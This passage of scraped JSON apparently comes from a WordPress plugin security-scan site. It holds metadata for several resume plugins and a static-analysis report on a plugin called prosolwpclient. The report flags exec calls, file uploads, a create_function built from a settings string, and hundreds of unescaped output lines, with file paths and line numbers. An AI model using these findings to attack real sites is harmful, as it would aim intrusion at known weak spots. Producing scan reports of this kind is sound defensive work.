web\u003C\u002Fli>\n\u003Cli>Sent recruiters to it and get hired!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>➡️ Useage of Shortcode:⬅️\u003C\u002Fp>\n\u003Cp>\u003Cstrong> To display resume use the below shortcode \u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cpre> [hm_resume_manager] \u003C\u002Fpre>\n\u003Cp>\u003Cstrong>📋 Feedback\u002FRating:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>If you find this plugin helpful, feel free to give us your valuable review. Rate us and share this plugin with your friends and others. This will motivate us and help us to grow.\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fhm-resume-manager\u002Freviews\u002F#new-post\" rel=\"ugc\">Rate Us\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🔥 Other Plugins from \u003Ca href=\"https:\u002F\u002Fhmplugin.com\" rel=\"nofollow ugc\">HM Plugins\u003C\u002Fa>:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-books-gallery\u002F\" rel=\"ugc\">WP Books Gallery\u003C\u002Fa> Books Gallery Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fworldwide-breaking-news-headlines\u002F\" rel=\"ugc\">Worldwide Breaking News Headlines\u003C\u002Fa> Breaking News, Headlines Widget Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-top-news\u002F\" rel=\"ugc\">WP Top News\u003C\u002Fa> Top News, Breaking News, Headlines Shortcoded Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-stripe-donation\u002F\" rel=\"ugc\">WordPress Stripe Donation\u003C\u002Fa> Donations Coolection Plugin for WordPress using Stripe Payement\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Ftiny-bar\u002F\" rel=\"ugc\">Tiny Bar\u003C\u002Fa> Message Bar Plugin for WordPress to display Message at Top\u002FBottom Bar of a web page\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-cool-author-box-widget\u002F\" rel=\"ugc\">HM – Cool Author Box\u003C\u002Fa> Author Box plugin for WordPress to display author info\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-resume-manager\u002F\" rel=\"ugc\">HM Resume Manager\u003C\u002Fa> A Resume\u002FCV Manager Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-product-catalog\u002F\" rel=\"ugc\">HM Product Catalog\u003C\u002Fa> A Product Catalog Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-wc-product-advertiser\u002F\" rel=\"ugc\">HM Wc Product Advertiser\u003C\u002Fa> Product Advertiser Plugin for Wocommerce\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-scroll-to-post\u002F\" rel=\"ugc\">WP Scroll To Post\u003C\u002Fa> Display random post(Single) at the bottom right corner\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-recent-posts-widget\u002F\" rel=\"ugc\">HM Recent Posts Widget\u003C\u002Fa> Ticker Post plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-alert-bars\u002F\" rel=\"ugc\">WP Alert Bars\u003C\u002Fa> Notification\u002FAlert box Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-simple-facebook-page\u002F\" rel=\"ugc\">FaceBook LikeBox\u003C\u002Fa> A FaceBook LikeBox Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-display-faq\u002F\" rel=\"ugc\">WP Display FAQ\u003C\u002Fa> FAQs manager plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-logo-showcase\u002F\" rel=\"ugc\">HM Logo Showcase\u003C\u002Fa> Logo manager plugin for WordPress\u003C\u002Fp>\n","WordPress Resume Manager plugin to display and manage personal resume or CV at your WordPress webpage.",7467,"2025-02-06T21:04:00.000Z","6.7.5","5.4","7.2",[108,20,21,86,88],"cv","http:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-resume-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhm-resume-manager.2.4.1.zip",92,{"slug":113,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":91,"downloaded":120,"rating":121,"num_ratings":27,"last_updated":122,"tested_up_to":104,"requires_at_least":123,"requires_php":124,"tags":125,"homepage":131,"download_link":132,"security_score":111,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"site24x7-rum","Site24x7 Real User Monitoring","1.3","Site24x7","https:\u002F\u002Fprofiles.wordpress.org\u002Fsite24x7integrations\u002F","\u003Cp>Real User Monitoring by Site24x7 gives accurate insight into real users application experience and helps visualise web app interaction patterns. Real User Monitoring provides deep insight into key performance metrics right from the initiation of the URL until the request is served back to the browser.\u003C\u002Fp>\n\u003Cp>The RUM plugin helps you add your Site24x7 RUM code snippet to the Head tag of your WordPress blog. Once added, Site24x7 immediately starts collecting data from your WordPress blog’s visitors. You can view all that collected data in \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fapp\u002Fapm#\u002Fapm\u002Frum\u002Flist\u002F\" rel=\"nofollow ugc\">Site24x7 console\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Site24x7 Real User Monitoring provides better understanding of performance issues by providing actionable data like showing real user performance by region, browser type, device used to access the application and more, these metric assist in pinpointing issues faster to make applications more fluid and user friendly. The back-end response time provides metrics from a server perspective calculating the time taken by the server to serve the request and statistics such as the page rendering time, document processing time and document downloading time, all of which help developers tailor applications to be more fluid to end users.please refer the help document for more information \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fhelp\u002Fapm\u002Frum.html\" rel=\"nofollow ugc\">site24x7-rum\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>P.S: You will need a Site24x7 account for this plugin. If you don’t have one, grab one at \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fsignup.html?pack=4&l=en\" rel=\"nofollow ugc\">site24x7.com\u003C\u002Fa> – its super-easy!\u003C\u002Fp>\n","Real User Monitoring (RUM) by Site24x7 provides deep and accurate insight into real users’experience on your WordPress setup.",3742,80,"2025-01-22T12:28:00.000Z","2.8","5.2.4",[126,127,128,129,130],"application-performance","real-user-monitoring","rum","user-experience-monitoring","website-monitoring","https:\u002F\u002Fwww.site24x7.com\u002Freal-user-monitoring.html","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsite24x7-rum.1.3.zip",{"slug":134,"name":135,"version":136,"author":137,"author_profile":138,"description":139,"short_description":140,"active_installs":91,"downloaded":141,"rating":142,"num_ratings":143,"last_updated":144,"tested_up_to":145,"requires_at_least":73,"requires_php":146,"tags":147,"homepage":150,"download_link":151,"security_score":152,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"wp-resume","WP Resume","2.5.7","Ben Balter","https:\u002F\u002Fprofiles.wordpress.org\u002Fbenbalter\u002F","\u003Cp>WP Resume is an out-of-the-box solution to get your resume online and keep it updated. Built on WordPress 3.0’s custom post type functionality, it offers a uniquely familiar approach to publishing. If you’ve got a WordPress site, you already know how to use WP Resume.\u003C\u002Fp>\n\u003Cp>You can \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002Fresume\u002F\" rel=\"nofollow ugc\">see it in action\u003C\u002Fa> or for information and troubleshooting, check out the \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002F2010\u002F09\u002F12\u002Fwordpress-resume-plugin\u002F\" rel=\"nofollow ugc\">Plugin Homepage\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Features include:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Support for sections (e.g., education, experience), organizations (e.g., somewhere state university, Cogs, Inc.), positions (e.g., bachelor of arts, chief widget specialist), and details (e.g., grew bottom line by 15%, president of the sustainability club)\u003C\u002Fli>\n\u003Cli>Supports multiple resumes, on the same page, or on their own\u003C\u002Fli>\n\u003Cli>Follows best practices in resume layout and design\u003C\u002Fli>\n\u003Cli>One click install, just start adding content\u003C\u002Fli>\n\u003Cli>Drag and drop ordering of resume elements\u003C\u002Fli>\n\u003Cli>Outputs in \u003Ca href=\"http:\u002F\u002Fmicroformats.org\u002Fwiki\u002Fhresume\" rel=\"nofollow ugc\">hResume\u003C\u002Fa> compatible format using HTMl5 semantic tags\u003C\u002Fli>\n\u003Cli>Can output as plain text for pasting into job applications\u003C\u002Fli>\n\u003Cli>Automatically saves revisions of every change you make\u003C\u002Fli>\n\u003Cli>The WYSIWYG editing experience you know and love\u003C\u002Fli>\n\u003Cli>Integrates with your theme like they were made for each other (via a shortcode)\u003C\u002Fli>\n\u003Cli>Spanish, Portuguese (BR), and French Translation Support\u003C\u002Fli>\n\u003Cli>Does not use pretentious accents on the word “resume”\u003C\u002Fli>\n\u003Cli>Extremely original title\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Under the hood:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Built on existing WordPress code, utilizing a single custom post type and two custom taxonomies\u003C\u002Fli>\n\u003Cli>JSON API so you can use the data anywhere\u003C\u002Fli>\n\u003Cli>Support for custom templates and CSS files (like a child theme, just place them in your theme directory)\u003C\u002Fli>\n\u003Cli>Plugin API hooks for developers to build on\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The hardest part of getting your resume online should be doing the work listed on it, not wrestling the publishing platform. Simply put, WP Resume steps aside and lets your experience shine.\u003C\u002Fp>\n\u003Ch4>Translations:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Spanish – \u003Ca href=\"http:\u002F\u002Frodbuaiz.com\u002F\" rel=\"nofollow ugc\">Rodolfo Buaiz\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Portuguese – \u003Ca href=\"http:\u002F\u002Frodbuaiz.com\u002F\" rel=\"nofollow ugc\">Rodolfo Buaiz\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>French – phpcore\u003C\u002Fli>\n\u003Cli>Slovak Translation – Branco of \u003Ca href=\"http:\u002F\u002Fwebhostinggeeks.com\u002Fuser-reviews\u002F\" rel=\"nofollow ugc\">WebHostingGeeks.com\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Developers,\u003C\u002Fstrong> have a killer feature you’d love to see included? Feel free to \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002F\" rel=\"nofollow ugc\">fork the project on GitHub\u003C\u002Fa> and submit your contributions via pull request.\u003C\u002Fp>\n\u003Cp>[Photo via \u003Ca href=\"http:\u002F\u002Fwww.flickr.com\u002Fphotos\u002Fshawnmichael\u002F4246330043\u002F\" rel=\"nofollow ugc\">shawnmichael\u003C\u002Fa>]\u003C\u002Fp>\n\u003Ch3>Donate\u003C\u002Fh3>\n\u003Cp>\u003Cem>Enjoy using WP Resume? Please consider \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002Fdonate\u002F\" rel=\"nofollow ugc\">making a small donation\u003C\u002Fa> to support the software’s continued development.\u003C\u002Fem>\u003C\u002Fp>\n\u003Ch3>How To Contribute\u003C\u002Fh3>\n\u003Cp>WP Resume is an open source project and is supported by the efforts of an entire community. We’d love for you to get involved. Whatever your level of skill or however much time you can give, your contribution is greatly appreciated.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Everyone\u003C\u002Fstrong> – help expand the projects \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fwiki\" rel=\"nofollow ugc\">documentation wiki\u003C\u002Fa> to make it easier for other users to get started\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Users\u003C\u002Fstrong> – download the latest \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Ftree\u002Fdevelop\" rel=\"nofollow ugc\">development version\u003C\u002Fa> of the plugin, and \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues\" rel=\"nofollow ugc\">submit bug\u002Ffeature requests\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Non-English Speaking Users\u003C\u002Fstrong> – \u003Ca href=\"http:\u002F\u002Ftranslations.benbalter.com\u002Fprojects\u002FWP-Resume\u002F\" rel=\"nofollow ugc\">Contribute a translation\u003C\u002Fa> using the GlotPress web interface – no technical knowledge required (\u003Ca href=\"http:\u002F\u002Ftranslations.benbalter.com\u002Fprojects\u002Fhow-to-translate\" rel=\"nofollow ugc\">how to\u003C\u002Fa>).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Developers\u003C\u002Fstrong> – \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Ftree\u002Fdevelop\" rel=\"nofollow ugc\">Fork the development version\u003C\u002Fa> and submit a pull request, especially for any \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues?direction=desc&sort=created&state=open\" rel=\"nofollow ugc\">known issues\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Where To Get Support Or Report An Issue\u003C\u002Fh3>\n\u003Cp>\u003Cem>There are various resources available, depending on the type of help you’re looking for:\u003C\u002Fem>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>For getting started and general documentation, please browse, and feel free to contribute to \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fwiki\" rel=\"nofollow ugc\">the project wiki\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For support questions (“How do I”, “I can’t seem to”, etc.) please search and if not already answered, open a thread in the \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002FWP-Resume\" rel=\"ugc\">Support Forums\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For technical issues (e.g., to submit a bug or feature request) please search and if not already filed, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues\" rel=\"nofollow ugc\">open an issue on GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For implementation, and all general questions (“Is it possible to..”, “Has anyone…”), please search, and if not already answered, post a topic to the \u003Ca href=\"https:\u002F\u002Fgroups.google.com\u002Fforum\u002F#!forum\u002FWP-Resume\" rel=\"nofollow ugc\">general discussion list serve\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n","Out-of-the-box solution to get your resume online. Built on WordPress's custom post types, it offers a uniquely familiar approach to publishing",46496,46,6,"2014-12-28T20:39:00.000Z","3.6.1","",[20,21,148,149,86],"online-reputation","personal-branding","http:\u002F\u002Fben.balter.com\u002F2010\u002F09\u002F12\u002Fwordpress-resume-plugin\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-resume.2.5.7.zip",85,{"slug":154,"name":155,"version":156,"author":157,"author_profile":158,"description":159,"short_description":160,"active_installs":161,"downloaded":162,"rating":13,"num_ratings":13,"last_updated":163,"tested_up_to":164,"requires_at_least":165,"requires_php":146,"tags":166,"homepage":169,"download_link":170,"security_score":152,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"bp-resume-page","BP Resume Page","1.0","fmeroney","https:\u002F\u002Fprofiles.wordpress.org\u002Ffmeroney\u002F","\u003Cp>Need to add an online resume to BuddyPress? We developed a pluging that is small and compact just for you. It gives the member the ability to add “Education”, “Professional Experience”, and “Skills” to their profile. It sorts the users entries by date, newest first, and allows them to delete unwanted entries. Simple to use, and follows the BuddyPress theme.\u003C\u002Fp>\n\u003Cp>There is no backend settings to configure, it’s all frontend, just that simple.\u003C\u002Fp>\n","Adds a resume page to BuddyPress profile. Also adds nav menu item under Avatar and in admin bar.",10,9288,"2012-06-04T03:02:00.000Z","3.3.2","3.0",[167,168,20,23,86],"buddy","buddypress","http:\u002F\u002Fscenicjobs.com\u002Fwordpress-plugins","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbp-resume-page.zip",{"attackSurface":172,"codeSignals":202,"taintFlows":1328,"riskAssessment":1582,"analyzedAt":1598},{"hooks":173,"ajaxHandlers":190,"restRoutes":191,"shortcodes":192,"cronEvents":197,"entryPointCount":27,"unprotectedCount":13},[174,181,186],{"type":175,"name":176,"callback":177,"priority":178,"file":179,"line":180},"action","http_api_curl","sar_custom_curl_timeout",9999,"public\u002Fclass-prosolwpclient-public.php",2001,{"type":182,"name":183,"callback":184,"priority":178,"file":179,"line":185},"filter","http_request_timeout","sar_custom_http_request_timeout",2002,{"type":182,"name":187,"callback":188,"priority":178,"file":179,"line":189},"http_request_args","sar_custom_http_request_args",2003,[],[],[193],{"tag":194,"callback":195,"file":179,"line":196},"prosolfrontend","proSol_prosolwpclientShortcode",65,[198],{"hook":199,"callback":199,"file":200,"line":201},"wp_ajax_proSol_dailytask_tableJobs","includes\u002Fclass-prosolwpclient-table-helper.php",356,{"dangerousFunctions":203,"sqlUsage":237,"outputEscaping":240,"fileOperations":1201,"externalRequests":81,"nonceChecks":1323,"capabilityChecks":50,"bundledLibraries":1324},[204,209,211,215,219,222,225,230,233,235],{"fn":205,"file":206,"line":207,"context":208},"exec","includes\u002FUploadHandler.php",971,"exec($cmd, $output, $error);",{"fn":205,"file":206,"line":210,"context":208},997,{"fn":212,"file":206,"line":213,"context":214},"move_uploaded_file",1090,"move_uploaded_file($uploaded_file, $file_path);",{"fn":216,"file":200,"line":217,"context":218},"ini_set",461,"ini_set('xdebug.var_display_max_depth', -1);",{"fn":216,"file":200,"line":220,"context":221},462,"ini_set('xdebug.var_display_max_children', -1);",{"fn":216,"file":200,"line":223,"context":224},463,"ini_set('xdebug.var_display_max_data', -1);",{"fn":226,"file":227,"line":228,"context":229},"create_function","includes\u002Fclass-setting.php",148,"$callback = create_function( '', 'echo \"' . str_replace( '\"', '\\\"', $section['desc'] ) . '\";'",{"fn":205,"file":231,"line":232,"context":208},"public\u002Fjs\u002FjQuery-File-Upload-master\u002Fserver\u002Fphp\u002FUploadHandler.php",1025,{"fn":205,"file":231,"line":234,"context":208},1051,{"fn":212,"file":231,"line":236,"context":214},1165,{"prepared":238,"raw":13,"locations":239},250,[],{"escaped":241,"rawEcho":242,"locations":243},1654,688,[244,248,250,252,255,256,257,259,261,263,264,266,269,270,271,274,276,277,279,281,282,283,284,286,288,290,292,293,295,297,299,301,303,305,307,309,311,313,315,317,318,320,322,324,326,328,330,332,334,336,338,340,342,344,346,348,350,352,354,356,358,360,362,363,365,367,369,371,373,375,377,378,380,381,383,385,387,389,391,393,395,397,399,401,403,406,409,410,412,414,416,417,419,421,423,425,427,429,431,433,435,437,439,441,443,444,446,448,450,452,454,456,458,460,462,464,466,468,470,472,474,476,478,480,482,484,486,488,490,492,494,496,499,501,503,505,507,509,511,513,515,517,519,521,523,525,527,528,530,532,534,536,537,538,540,542,544,546,547,549,551,553,555,557,558,560,562,564,566,569,571,573,575,577,579,581,583,584,585,587,588,590,591,593,595,596,598,600,602,604,605,607,609,611,613,615,616,618,620,622,624,626,628,630,632,634,635,637,639,641,643,645,647,649,651,653,655,657,658,660,662,664,666,668,670,672,674,676,678,679,680,681,683,685,687,689,690,692,693,696,698,700,702,705,707,709,710,712,713,715,716,718,719,720,721,723,724,726,727,729,730,731,732,734,735,737,738,740,741,744,745,747,748,750,751,753,754,756,757,758,759,760,761,763,764,765,766,768,769,771,772,774,775,777,778,780,781,783,784,786,787,789,790,792,793,794,795,796,797,799,800,801,802,804,805,807,808,810,811,813,814,816,817,819,820,822,823,825,826,828,829,831,832,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,919,920,921,922,924,925,926,927,929,930,932,933,935,936,938,939,940,941,943,944,946,948,950,952,954,956,958,959,960,961,962,963,965,967,969,971,972,974,976,977,979,981,982,984,985,987,988,990,992,994,995,997,998,1000,1002,1004,1005,1006,1008,1009,1011,1012,1014,1016,1018,1019,1021,1022,1024,1026,1028,1029,1032,1034,1036,1038,1039,1041,1042,1043,1044,1045,1046,1048,1050,1051,1053,1055,1056,1057,1059,1060,1061,1062,1063,1064,1065,1067,1068,1070,1072,1073,1074,1076,1078,1079,1080,1082,1084,1086,1088,1089,1090,1091,1093,1095,1096,1097,1098,1100,1101,1102,1103,1104,1106,1107,1108,1109,1111,1113,1114,1115,1117,1119,1121,1122,1124,1125,1127,1128,1130,1131,1133,1135,1137,1138,1139,1140,1141,1143,1144,1146,1147,1149,1150,1152,1154,1156,1157,1159,1160,1162,1164,1166,1167,1169,1170,1172,1174,1176,1177,1179,1180,1182,1184,1185,1187,1188,1189,1191,1193,1194,1195,1196,1198,1200,1202,1203,1204,1205,1208,1209,1211,1212,1213,1214,1215,1216,1218,1219,1221,1222,1223,1225,1226,1227,1228,1230,1232,1233,1234,1236,1237,1239,1240,1241,1242,1244,1245,1246,1247,1248,1249,1251,1252,1254,1256,1258,1259,1261,1263,1265,1267,1269,1271,1272,1273,1275,1277,1278,1280,1281,1283,1285,1287,1288,1289,1290,1291,1293,1294,1295,1296,1297,1298,1299,1300,1301,1302,1303,1304,1305,1306,1307,1308,1310,1312,1313,1315,1316,1317,1319,1321],{"file":245,"line":246,"context":247},"admin\u002Fclass-prosolwpclient-admin.php",338,"raw output",{"file":245,"line":249,"context":247},351,{"file":245,"line":251,"context":247},425,{"file":253,"line":254,"context":247},"admin\u002Ftemplates\u002Fadmin-overview.php",25,{"file":253,"line":254,"context":247},{"file":253,"line":254,"context":247},{"file":253,"line":258,"context":247},42,{"file":253,"line":260,"context":247},105,{"file":253,"line":262,"context":247},143,{"file":253,"line":228,"context":247},{"file":253,"line":265,"context":247},198,{"file":267,"line":268,"context":247},"admin\u002Ftemplates\u002Fadmin-settings-display.php",31,{"file":267,"line":268,"context":247},{"file":267,"line":268,"context":247},{"file":272,"line":273,"context":247},"admin\u002Ftemplates\u002Fadmin-view-single-table-list.php",36,{"file":272,"line":275,"context":247},40,{"file":272,"line":258,"context":247},{"file":272,"line":278,"context":247},51,{"file":272,"line":280,"context":247},55,{"file":272,"line":280,"context":247},{"file":272,"line":280,"context":247},{"file":272,"line":152,"context":247},{"file":206,"line":285,"context":247},1124,{"file":206,"line":287,"context":247},1135,{"file":227,"line":289,"context":247},358,{"file":227,"line":291,"context":247},396,{"file":227,"line":251,"context":247},{"file":227,"line":294,"context":247},588,{"file":227,"line":296,"context":247},717,{"file":227,"line":298,"context":247},751,{"file":227,"line":300,"context":247},780,{"file":227,"line":302,"context":247},818,{"file":227,"line":304,"context":247},838,{"file":227,"line":306,"context":247},851,{"file":227,"line":308,"context":247},875,{"file":227,"line":310,"context":247},898,{"file":227,"line":312,"context":247},965,{"file":227,"line":314,"context":247},983,{"file":227,"line":316,"context":247},1007,{"file":227,"line":232,"context":247},{"file":227,"line":319,"context":247},1029,{"file":227,"line":321,"context":247},1040,{"file":227,"line":323,"context":247},1059,{"file":227,"line":325,"context":247},1074,{"file":227,"line":327,"context":247},1095,{"file":227,"line":329,"context":247},1121,{"file":227,"line":331,"context":247},1147,{"file":227,"line":333,"context":247},1162,{"file":227,"line":335,"context":247},1178,{"file":227,"line":337,"context":247},1188,{"file":227,"line":339,"context":247},1198,{"file":227,"line":341,"context":247},1216,{"file":227,"line":343,"context":247},1450,{"file":227,"line":345,"context":247},1462,{"file":179,"line":347,"context":247},516,{"file":179,"line":349,"context":247},771,{"file":179,"line":351,"context":247},798,{"file":179,"line":353,"context":247},821,{"file":179,"line":355,"context":247},830,{"file":179,"line":357,"context":247},854,{"file":179,"line":359,"context":247},855,{"file":179,"line":361,"context":247},879,{"file":179,"line":361,"context":247},{"file":179,"line":364,"context":247},880,{"file":179,"line":366,"context":247},881,{"file":179,"line":368,"context":247},882,{"file":179,"line":370,"context":247},883,{"file":179,"line":372,"context":247},894,{"file":179,"line":374,"context":247},895,{"file":179,"line":376,"context":247},896,{"file":179,"line":376,"context":247},{"file":179,"line":379,"context":247},897,{"file":179,"line":310,"context":247},{"file":179,"line":382,"context":247},899,{"file":179,"line":384,"context":247},900,{"file":179,"line":386,"context":247},901,{"file":179,"line":388,"context":247},902,{"file":179,"line":390,"context":247},947,{"file":179,"line":392,"context":247},1100,{"file":179,"line":394,"context":247},1142,{"file":179,"line":396,"context":247},1259,{"file":179,"line":398,"context":247},2165,{"file":231,"line":400,"context":247},1203,{"file":231,"line":402,"context":247},1214,{"file":404,"line":405,"context":247},"public\u002Ftemplates\u002Fprosolwpclientcrawler.php",61,{"file":407,"line":408,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobapply.php",82,{"file":407,"line":152,"context":247},{"file":407,"line":411,"context":247},86,{"file":407,"line":413,"context":247},91,{"file":407,"line":415,"context":247},95,{"file":407,"line":67,"context":247},{"file":407,"line":418,"context":247},97,{"file":407,"line":420,"context":247},134,{"file":407,"line":422,"context":247},138,{"file":407,"line":424,"context":247},144,{"file":407,"line":426,"context":247},156,{"file":407,"line":428,"context":247},160,{"file":407,"line":430,"context":247},165,{"file":407,"line":432,"context":247},232,{"file":407,"line":434,"context":247},295,{"file":407,"line":436,"context":247},304,{"file":407,"line":438,"context":247},363,{"file":407,"line":440,"context":247},402,{"file":407,"line":442,"context":247},413,{"file":407,"line":251,"context":247},{"file":407,"line":445,"context":247},427,{"file":407,"line":447,"context":247},436,{"file":407,"line":449,"context":247},438,{"file":407,"line":451,"context":247},554,{"file":407,"line":453,"context":247},555,{"file":407,"line":455,"context":247},556,{"file":407,"line":457,"context":247},557,{"file":407,"line":459,"context":247},558,{"file":407,"line":461,"context":247},559,{"file":407,"line":463,"context":247},560,{"file":407,"line":465,"context":247},561,{"file":407,"line":467,"context":247},562,{"file":407,"line":469,"context":247},563,{"file":407,"line":471,"context":247},564,{"file":407,"line":473,"context":247},565,{"file":407,"line":475,"context":247},579,{"file":407,"line":477,"context":247},595,{"file":407,"line":479,"context":247},597,{"file":407,"line":481,"context":247},607,{"file":407,"line":483,"context":247},609,{"file":407,"line":485,"context":247},620,{"file":407,"line":487,"context":247},622,{"file":407,"line":489,"context":247},633,{"file":407,"line":491,"context":247},637,{"file":407,"line":493,"context":247},682,{"file":407,"line":495,"context":247},695,{"file":497,"line":498,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobdetails.php",115,{"file":497,"line":500,"context":247},120,{"file":497,"line":502,"context":247},203,{"file":497,"line":504,"context":247},211,{"file":497,"line":506,"context":247},218,{"file":497,"line":508,"context":247},225,{"file":497,"line":510,"context":247},230,{"file":497,"line":512,"context":247},238,{"file":497,"line":514,"context":247},243,{"file":497,"line":516,"context":247},251,{"file":497,"line":518,"context":247},262,{"file":497,"line":520,"context":247},280,{"file":497,"line":522,"context":247},299,{"file":497,"line":524,"context":247},318,{"file":497,"line":526,"context":247},327,{"file":497,"line":246,"context":247},{"file":497,"line":529,"context":247},343,{"file":497,"line":531,"context":247},348,{"file":497,"line":533,"context":247},424,{"file":497,"line":535,"context":247},464,{"file":497,"line":535,"context":247},{"file":497,"line":535,"context":247},{"file":497,"line":539,"context":247},484,{"file":497,"line":541,"context":247},492,{"file":497,"line":543,"context":247},499,{"file":497,"line":545,"context":247},509,{"file":497,"line":545,"context":247},{"file":497,"line":548,"context":247},517,{"file":497,"line":550,"context":247},519,{"file":497,"line":552,"context":247},526,{"file":497,"line":554,"context":247},528,{"file":497,"line":556,"context":247},531,{"file":497,"line":556,"context":247},{"file":497,"line":559,"context":247},539,{"file":497,"line":561,"context":247},541,{"file":497,"line":563,"context":247},548,{"file":497,"line":565,"context":247},550,{"file":567,"line":568,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchform.php",101,{"file":567,"line":570,"context":247},147,{"file":567,"line":572,"context":247},155,{"file":567,"line":574,"context":247},182,{"file":567,"line":576,"context":247},184,{"file":567,"line":578,"context":247},196,{"file":567,"line":580,"context":247},226,{"file":567,"line":582,"context":247},249,{"file":567,"line":238,"context":247},{"file":567,"line":518,"context":247},{"file":567,"line":586,"context":247},275,{"file":567,"line":449,"context":247},{"file":567,"line":589,"context":247},443,{"file":567,"line":220,"context":247},{"file":567,"line":592,"context":247},508,{"file":567,"line":594,"context":247},514,{"file":567,"line":550,"context":247},{"file":567,"line":597,"context":247},520,{"file":567,"line":599,"context":247},522,{"file":567,"line":601,"context":247},